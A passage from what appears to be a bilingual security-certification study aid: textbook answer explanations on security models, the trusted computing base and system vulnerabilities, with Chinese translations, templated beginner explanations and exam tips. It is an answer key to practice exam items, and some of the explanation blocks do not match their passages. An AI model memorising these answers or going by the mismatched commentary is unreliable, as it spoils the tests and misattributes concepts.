Aggregation is the act of collecting multiple pieces of nonsensitive or low-value information and combining it or aggregating it to learn sensitive or high-value information. 6. B. An access control matrix assembles ACLs from multiple objects into a single table. The rows of that table are the ACEs of a subject across those objects; thus, they are a capabilities list. Separation of duties is the division of administrative tasks into compartments or silos; it is effectively the application of the principle of least privilege to administrators. Biba is a security model that focuses on integrity protection across security levels.

Clark–Wilson is a security model that protects integrity using an access control triplet. 7. C. The trusted computing base (TCB) has a component known as the reference monitor in theory, which becomes the security kernel in implementation. The other options do not have this feature. The information flow model is focused on the control of information movement. The Biba model is focused on protecting integrity across a lattice security structure. The Brewer and Nash model was created to permit access controls to change dynamically based on a user's previous activity. 8. C.

The three parts of the Clark–Wilson model's access control relationship (aka access triple) are subject, object, and program (or interface). Input sanitization is not an element of the Clark–Wilson model. 9. C. The TCB is the combination of hardware, software, and controls that work together to enforce a security policy. The other options are incorrect. Hosts on a network that support secure transmissions may be able to support VPN connections, use TLS encryption, or implement some other form of data-in-transit protection mechanism. The operating system kernel, other OS components, and device drivers are located in

中文直译 / 整理

因为此操作违反了Bell–LaPadula星属性的字面表述,但并未违背其精神 或意图,即防止未经授权的披露。 扰动是指在数据库管理系统中使用虚假 或误导性数据,以转移或阻止信息保密攻击。 非干扰是指限制较高安全级 别主体的行为,使其不影响系统状态或较低安全级别主体的行为。 如果强 制执行非干扰,则禁止将文件写入较低级别。 聚合是指收集多个不敏感或 低价值信息片段,并将其合并或聚合,以获取敏感或高价值信息。 6. B. 访问控制矩阵将多个对象的ACL汇总到一个表格中。 该表格的行是主体 在这些对象上的ACE,因此它们是一个能力列表。 职责分离是将管理任务划 分为独立的模块或孤岛; 这实际上是将最小权限原则应用于管理员。 Biba 是 一个专注于跨安全级别保护完整性的安全模型。 Clark–Wilson 是一个使用 访问控制三元组保护完整性的安全模型。 7. C. 可信计算基(TCB)在理论上包含一个称为参考监视器的组件,在实 现中则称为安全内核。 其他选项不具备此特性。 信息流模型专注于控制信 息的流动。 Biba 模型专注于在格状安全结构中保护完整性。 Brewer 和 Nash 模型旨在根据用户的先前活动动态更改访问控制。

8. C. Clark–Wilson 模型的访问控制关系(又称访问三元组)的三个部分是 主体、对象和程序(或 interface)。 输入清理不是克拉克‑威尔逊模型的组成部分。 9. C. TCB 是硬件、软件和控制措施的组合,它们协同工作以强制执行安全 策略。 其他选项均不正确。 支持安全传输的网络主机可能能够支持 VPN 连 接、使用 TLS 加密,或实现某种其他形式的数据传输保护机制。 操作系统内 核、其他操作系统组件和设备驱动程序位于

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
学习单元 98 / PDF P1492

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Rings 0–2 of the protection rings concept, or in the Kernel Mode ring in the variation used by Microsoft Windows (see Chapter 9). The predetermined set or domain (i.e., a list) of objects that a subject can access is an allow list. 10. A, B. Although the most correct answer in the context of this chapter is option B, the imaginary boundary that separates the TCB from the rest of the system, option A, the boundary of the physically secure area surrounding your system, is also a correct answer in the context of physical security. The network where your firewall resides is not a unique concept or term, since a firewall can exist in any network as either a hardware device or a software service.

A border firewall could be considered a security perimeter protection device, but that was not a provided option. Any connections to your computer system are just pathways of communication to a system's interface—they are not labeled as a security perimeter. 11. C. The reference monitor validates access to every resource prior to granting the requested access. The other options are incorrect. Option D, the security kernel, is the collection of TCB components that work together to implement the reference monitor functions. In other words, the security kernel is the implementation of the reference monitor concept.

Option A, a TCB partition, and option B, a trusted library, are not valid TCB concept components. 12. B. Option B is the only option that correctly defines a security model. The other options are incorrect. Option A is a definition of a security policy. Option C is a formal evaluation of the security of a system. Option D is the definition of virtualization. 13. D. The Bell–LaPadula and Biba models are built on the state machine model. Take-Grant and Clark–Wilson are not directly based or built on the state machine model. 14. A. Only the Bell–LaPadula model addresses data confidentiality. The Biba and Clark–Wilson models address data integrity.

The Brewer and Nash model prevents conflicts of interest. 15. C. The no read-up property, also called the simple security property, prohibits subjects from reading a higher security level object. The other options are incorrect. Option A, the (star) security property of Bell– LaPadula, is no write-down. Option B, no write-up, is the (star) property of Biba. Option D, no read-down, is the simple property of Biba.

中文直译 / 整理

保护环概念中的环0–2,或在微软Windows使用的变体中的内核模式环 (见第9章)。 主体可访问的预定义对象集或域(即列表)称为允许列表。 10. A、B。 尽管在本章的上下文中,最正确的答案是选项B,即区分TCB与系 统其余部分的虚拟边界; 但在物理安全的上下文中,选项A——围绕您系统的 物理安全区域的边界——也是一个正确的答案。 防火墙所在的网络不是一个独 特的概念或术语,因为防火墙可以作为硬件设备或软件服务存在于任何网络中。 边界防火墙可被视为一种安全边界防护设备,但该选项并未提供。 任何与您计 算机系统的连接都只是通往系统接口的通信路径——它们并不被称为安全边界。 11. C。 参考监视器在授予所请求的访问权限之前,会验证对每个资源的访问。 其他选项均不正确。 选项D,安全内核,是协同实现参考监视器功能的TCB组 件集合。 换句话说,安全内核是参考监视器概念的实现。 选项A,TCB分区, 和选项B,可信库,都不是有效的TCB概念组件。 12. B. 选项 B 是唯一正确定义安全模型的选项。 其他选项均不正确。 选项 A 是安全策 略的定义。 选项 C 是对系统安全性的正式评估。 选项 D 是虚拟化的定义。

13. D. Bell–LaPadula 模型和 Biba 模型基于状态机模型构建。 Take‑Grant 和 Clark–Wilson 模型并非直接基于或构建于状态机模型。 14. A. 仅有 Bell–LaPadula 模型涉及数据机密性。 Biba 模型和 Clark– Wilson 模型涉及数据完整性。 Brewer 和 Nash 模型防止利益冲突。 15. C. 不可上读属性,也称为简单安全属性,禁止主体读取更高安全级别的 对象。 其他选项均不正确。 选项 A,Bell–LaPadula 的(星)安全属性是不 可下写。 选项 B,不可上写是 Biba 的(星)属性。 选项 D,不可下读是 Biba 的简单属性。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

安全边界:安全边界是不同信任级别或安全要求交接的位置。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

内网/外网、DMZ/内网、不同分类级别之间都是常见边界。

Policy 高层、强制、稳定;Procedure 具体步骤。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
安全边界 安全边界是不同信任级别或安全要求交接的位置。
政策 政策是高层原则,说明必须遵守什么。
防火墙 防火墙根据规则控制网络流量进出。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 99 / PDF P1493

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

16. B. The simple property of Biba is no read-down, but the implied allowed opposite is read-up. The other options are incorrect. Option A, writedown, is the implied opposite allow of the (star) property of Biba, which is no write-up. Option C, no write-up, is the (star) property of Biba. Option D, no read-down, is the simple property of Biba. 17. D. Security targets (STs) specify the vendor's security claims that are built into a target of evaluation (TOE). STs are considered the implemented security measures or the “I will provide” from the vendor. The other options are incorrect.

Option A, protection profiles (PPs), specify the security requirements and protections for a product that is to be evaluated (the TOE), which are considered the security desires or the “I want” from a customer. Option B, evaluation assurance levels (EALs), are the various levels of testing and confirmation of systems' security capabilities, and the number of the level indicates what kind of testing and confirmation has been performed. Option C, an authorizing official (AO), is the entity with the authority to issue an authorization to operate (ATO). 18. A, C, E.

The four types of ATOs are authorization to operate (not listed as an option), common control authorization, authorization to use, and denial of authorization. The other options are incorrect. 19. B. Memory protection is a core security component that must be designed and implemented into an operating system. It must be enforced regardless of the programs executing in the system. Otherwise, instability, violation of integrity, denial of service, and disclosure are likely results. The other options are incorrect. Option A, the use of virtualization, would not cause all of those security issues.

Option C, the Clark–Wilson model based on the access control triplet is about protecting integrity through a restricted interface, and thus is not the cause of the issues of this scenario. Option D, the use of encryption, is a protection, not a cause of these security issues. 20. A. A constrained or restricted interface is implemented within an application to restrict what users can do or see based on their privileges. The purpose of a constrained interface is to limit or restrict the actions of both authorized and unauthorized users. The other options are incorrect. Option B describes authentication. Option C describes auditing and accounting. Option D describes virtual memory. 16. B. Biba

中文直译 / 整理

模型的简单属性是不可下读,但其隐含允许的相反操作是可上读。 其他选项均不正确。 选项 A,写入下,是 Biba 模型(星)属性的隐含允许 操作,该属性为不可上写。 选项 C,不可上写,是 Biba 模型的(星)属性。 选项 D,不可下读,是 Biba 模型的简单属性。 17. D. 安全目标(STs)规定了供应商在评估目标(TOE)中实现的安全声明。 STs 被视为供应商所实施的安全措施或“我将提供”的内容。 其他选项均不 正确。 选项 A,保护轮廓(PPs)规定了待评估产品(即 TOE)的安全需求 和保护措施,被视为客户所期望的“我想要”的内容。 选项 B,评估保证等 级(EALs)是系统安全能力测试与确认的不同等级,等级数字表明已执行的 测试与确认类型。 选项 C,授权官员(AO)是具有权限颁发运行授权( ATO)的实体。 18. A、C、E。 ATO的四种类型包括操作授权(未列为选项)、通用控制授权、 使用授权和拒绝授权。 其他选项均不正确。 19. B。 内存保护是必须在操作系统中设计和实现的核心安全组件。 无论系统 中运行的是什么程序,都必须强制执行内存保护。

否则,很可能导致系统不稳 定、完整性被破坏、拒绝服务和信息泄露。 其他选项均不正确。 选项A,虚拟 化的使用,不会导致所有这些安全问题。 选项C,基于访问控制三元组的 Clark–Wilson模型,是通过受限接口保护完整性,因此并非本场景中问题的 原因。 选项D,加密的使用是一种保护措施,而非导致这些安全问题的原因。 20. A。 受限接口或约束接口在应用程序中实现,用于根据用户的权限限制其 可执行或可见的操作。 受限接口的目的是限制授权用户和非授权用户的操作。 其他选项均不正确。 选项B描述的是身份验证。 选项C描述的是审计和记账。 选项D描述的是虚拟内存。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
加密 加密把内容变成未授权者看不懂的形式。
运行授权 ATO ATO 表示系统被授权在特定条件下运行。文档不足可能导致 ATO 丢失。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 100 / PDF P1494

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Chapter 9: Security Vulnerabilities, Threats, and Countermeasures 1. A, C, D, F. The statements in options A, C, D, and F are all valid elements or considerations of shared responsibility. The other options are incorrect. Always consider the threat to both tangible and intangible assets as a tenet of risk management and BIA. Multiple layers of security are required to protect against adversary attempts to gain access to internal sensitive resources and is a general principle of security known as defense in depth. 2. C. Multitasking is processing more than one task at the same time.

In most cases, multitasking is simulated by the OS (using multiprogramming or pseudo-simultaneous execution) even when not supported by the processor. Multicore (not listed as an option) is also able to perform simultaneous execution but does so with multiple execution cores on one or more CPUs. Multistate is a type of system that can operate at various security levels (or classifications, risk levels, etc.). Multithreading permits multiple concurrent tasks (i.e., threads) to be performed within a single process.

In a multiprocessing environment, a multiprocessor computing system (that is, one with more than one CPU) harnesses the power of more than one processor to complete the execution of a multithreaded application. 3. C. JavaScript remains the one mobile code technology that may affect the security of modern browsers and their host OSs. Java is deprecated for general internet use, and browsers do not have native support for Java. A Java add-on is still available to install, but it is not preinstalled, and general security guidance recommends avoiding it on any internet-facing browser. Flash is deprecated; no modern browser supports it natively.

Adobe has abandoned it, and most browsers actively block the add-on. ActiveX is also deprecated, and though it was always only a Microsoft Windows technology, it was only supported by Internet Explorer, not Edge (either in its original form or the more recent Chromium-based version). Although Internet Explorer was present on the original Windows 10, this scenario stated that all other browsers were deactivated or blocked. Thus, this scenario is limited to the latest Edge browser. This question assumes you understand the latest version of Windows is Windows 11 and the latest version of Microsoft's browser is Edge (as of Q1 2024).

中文直译 / 整理

第9章:安全漏洞、威胁与应对措施 1. A、C、D、F。 选项A、C、D和F中的陈述均为共享责任的有效要素或考 量因素。 其他选项均不正确。 在风险管理与BIA中,始终应将对有形和无形 资产的威胁视为基本原则。 为防范攻击者试图访问内部敏感资源,需要多层 安全防护,这是被称为纵深防御的安全通用原则。 2. C。 多任务处理是指同时处理多个任务。 在大多数情况下,即使处理器不 支持,操作系统也会通过多道程序设计或伪并行执行来模拟多任务处理。 多 核(未作为选项列出)也能实现并行执行,但它是通过一个或多个CPU上的 多个执行核心来完成的。 多状态是一种能够在不同安全级别(或分类、风险 级别等)下运行的系统类型。 多线程允许在单个进程中执行多个并发任务 (即线程)。 在多处理环境中,多处理器计算系统(即具有多个CPU的系统) 利用多个处理器的算力来完成多线程应用程序的执行。 3. C. JavaScript 是唯一可能影响现代浏览器及其宿主操作系统安全性的移动 代码技术。 Java 已被弃用,不再适用于常规互联网使用,且浏览器不再原生 支持 Java。

尽管仍可安装 Java 插件,但其并非预装,且通用安全建议推荐 在任何面向互联网的浏览器上避免使用。 Flash 已被弃用; 现代浏览器均不 原生支持它。 Adobe 已放弃该技术,且大多数浏览器会主动阻止该插件。 ActiveX 同样已被弃用,尽管它始终仅为 Microsoft Windows 技术,且仅 由 Internet Explorer 支持,而 Edge(无论是原始版本还是近期基于 Chromium 的版本)均不支持。 虽然 Internet Explorer 曾存在于最初的 Windows 10 中,但本场景说明所有其他浏览器均已被停用或阻止。 因此, 本场景仅限于最新的 Edge 浏览器。 本题假设您了解截至 2024 年第一季度, Windows 的最新版本为 Windows 11,微软浏览器的最新版本为 Edge。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

纵深防御:纵深防御不是一道门,而是一层又一层控制。

程序:程序是一步一步怎么做。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

多层控制串联、避免单点失败,就是 defense in depth。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
纵深防御 纵深防御不是一道门,而是一层又一层控制。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 101 / PDF P1495

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

4. A. In many grid computing implementations, grid members can access the contents of the distributed work segments or divisions. This grid computing over the Internet is not usually the best platform for sensitive operations. Grid computing is able to handle and compensate for latency of communications, duplicate work, and capacity fluctuation. 5. B. Option B references a VDI or VMI instance that serves as a virtual endpoint for accessing cloud assets and services, but this concept is not specifically relevant to or a requirement of this scenario. The remaining items are relevant to the selection process in this scenario. These are all compute security–related concepts.

Option A, security groups, are collections of entities, typically users, but can also be applications and devices, which can be granted or denied access to perform specific tasks or access certain resources or assets. This supports the requirement of controlling which applications can access which assets. Option C, dynamic resource allocation (aka elasticity), is the ability of a cloud process to use or consume more resources (such as compute, memory, storage, or networking) when needed. This supports the requirement of processing significant amounts of data in short periods of time.

Option D is a management or security mechanism, which is able to monitor and differentiate between numerous instances of the same VM, service, app, or resource. This supports the requirement of prohibiting VM sprawl or repetition of operations. 6. D. A large utility company is very likely to be using supervisory control and data acquisition (SCADA) to manage and operate their equipment; therefore, that is the system that the APT group would have compromised. A multifunction printer (MFP) is not likely to be the attack point that granted the APT group access to the utility distribution nodes.

A real-time OS (RTOS) may have been present on some of the utility company's systems, but that is not the obvious target for an attack to take over control of an entire utility service. There may be system on chip (SoC) equipment present at the utility, but that would still be controlled and accessed through the SCADA system at a utility company. 7. C. Secondary memory is a term used to describe magnetic, optical, or flash media (i.e., typical storage devices like HDD, SSD, CD, DVD, and thumb drives). These devices will retain their contents after being removed from the computer and may later be read by another user.

Static RAM and dynamic RAM are types of real memory and thus are all the same concept in relation to being volatile—meaning they lose any data 4. A.

中文直译 / 整理

在许多网格计算实现中,网格成员可以访问分布式工作段或分区的内容。 通过互联网进行的网格计算通常不是敏感操作的最佳平台。 网格计算能够处 理并补偿通信延迟、重复工作和容量波动。 5. B. 选项 B 引用了一个 VDI 或 VMI 实例,该实例作为访问云资产和服务的 虚拟端点,但此概念与此场景并非特定相关或为必需。 其余选项均与此场景 的选择过程相关。 这些均为与计算安全相关的概念。 选项 A,安全组,是实 体的集合,通常是用户,但也可能是应用程序和设备,可以被授予或拒绝执 行特定任务或访问特定资源或资产的权限。 这支持了控制哪些应用程序可以 访问哪些资产的要求。 选项 C,动态资源分配(又称弹性),是指云进程在 需要时能够使用或消耗更多资源(如计算、内存、存储或网络)的能力。 这 支持了在短时间内处理大量数据的要求。 选项 D 是一种管理或安全机制,能 够监控并区分同一虚拟机、服务、应用程序或资源的多个实例。 这支持了禁 止虚拟机蔓延或操作重复的要求。 6. D. 一家大型公用事业公司很可能使用 supervisory control and data acquisition (SCADA) 系统来管理和操作其设备;

因此,APT 组织所入侵的 正是该系统。 多功能打印机(MFP)不太可能是 APT 组织用来访问公用事 业分配节点的攻击入口。 实时操作系统(RTOS)可能存在于该公用事业公 司的某些系统中,但这并非攻击以控制整个公用事业服务的明显目标。 公用 事业公司中可能存在系统级芯片(SoC)设备,但这些设备仍需通过 SCADA 系统进行控制和访问。 7. C. 辅助存储器是用来描述磁性、光学或闪存介质(例如常见的存储设备如 HDD、SSD、CD、DVD 和 U 盘)的术语。 这些设备在从计算机中移除后仍 能保留其内容,并可由其他用户随后读取。 静态 RAM 和动态 RAM 是主存 的类型,因此在易失性方面属于同一概念——即它们会丢失所有数据。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

程序:程序是一步一步怎么做。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

恢复时间目标 RTO:RTO 是业务或系统最多能中断多久。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

RTO 问时间:多久必须恢复。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
恢复时间目标 RTO RTO 是业务或系统最多能中断多久。
学习单元 102 / PDF P1496

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

they were holding when power is lost or cycled. Static RAM is faster and more costly, and dynamic RAM requires regular refreshing of the stored contents. Take notice in this question that three of the options were effectively synonyms (at least from the perspective of volatile versus nonvolatile storage). If you notice synonyms among answer options, realize that none of the synonyms can be a correct answer for singleanswer multiple-choice questions. 8. C. The primary security concern of a distributed computing environment (DCE) is the interconnectedness of the components. This configuration could allow for error or malware propagation as well.

If an adversary compromises one component, it may grant them the ability to compromise other components in the collective through pivoting and lateral movement. The other options are incorrect. Unauthorized user access, identity spoofing, and poor authentication are potential weaknesses of most systems; they are not unique to DCE solutions. However, these issues can be directly addressed through proper design, coding, and testing. However, the interconnectedness of components is a native characteristic of DCE that cannot be removed without discarding the DCE design concept itself. 9. C. The best means to reduce IoT risk from these options is to keep devices current on updates.

Using public IP addresses will expose the IoT devices to attack from the internet. Powering off devices is not a useful defense—the benefit of IoT is that they are always running and ready to be used or take action when triggered or scheduled. Blocking access to the Internet will prevent the IoT devices from obtaining updates themselves, may prevent them from being controlled through a mobile device app, and will prevent communication with any associated cloud service. 10. D. Microservices are an emerging feature of web-based solutions and are derivative of service-oriented architecture (SOA).

A microservice is simply one element, feature, capability, business logic, or function of a web application that can be called upon or used by other web applications. It is the conversion or transformation of a capability of one web application into a microservice that can be called upon by numerous other web applications. The relationship to an application programming interface (API) is that each microservice must have a clearly defined (and secured!) API to allow for I/O between multi-microservices as well as to and from other applications. The other options are incorrect since they

中文直译 / 整理

在断电或重启时它们所保持的内容。 静态随机存取存储器(SRAM)速度 更快但成本更高,而动态随机存取存储器(DRAM)则需要定期刷新存储 内容。 请注意本题中三个选项实质上是同义词(至少从易失性与非易失性 存储的角度来看)。 如果你在选项中发现同义词,请意识到在单选题中, 这些同义词都不可能是正确答案。 8. C. 分布式计算环境(DCE)的主要安全顾虑在于其组件的互连性。 这种配 置也可能导致错误或恶意软件的传播。 如果攻击者入侵了其中一个组件,他 们可能通过跳板和横向移动,获得入侵整个系统中其他组件的能力。 其他选 项均不正确。 未经授权的用户访问、身份伪造和弱身份验证是大多数系统的 潜在弱点,但并非DCE解决方案所独有。 然而,这些问题可以通过适当的设 计、编码和测试直接解决。 但组件的互连性是DCE的固有特性,若移除这一 特性,则等于放弃DCE的设计理念本身。 9. C. 在这些选项中,降低物联网风险的最佳方法是保持设备及时更新。 使用 公共IP地址会使物联网设备暴露于互联网攻击之下。 关闭设备电源并非有效 的防御手段——物联网的优势在于其始终运行,可在被触发或按计划时立即 响应或执行操作。

阻止互联网访问将使物联网设备无法获取更新,可能阻止 其通过移动设备应用程序进行控制,并会中断与任何关联云服务的通信。 10. D. 微服务是基于Web的解决方案中的一项新兴特性,源自面向服务的架构 (SOA)。 微服务仅仅是Web应用程序的一个元素、功能、能力、业务逻辑 或函数,可被其他Web应用程序调用或使用。 它是将一个Web应用程序的某 种能力转换为可被众多其他Web应用程序调用的微服务的过程。 微服务与应用 程序编程接口(API)的关系在于,每个微服务都必须具有一个明确定义(且 已保护! )的API,以实现多微服务之间以及与其他应用程序之间的输入/输出 交互。 其他选项均不正确,因为它们

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

程序:程序是一步一步怎么做。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

Step-by-step、SOP 常对应 procedure。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 103 / PDF P1497

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

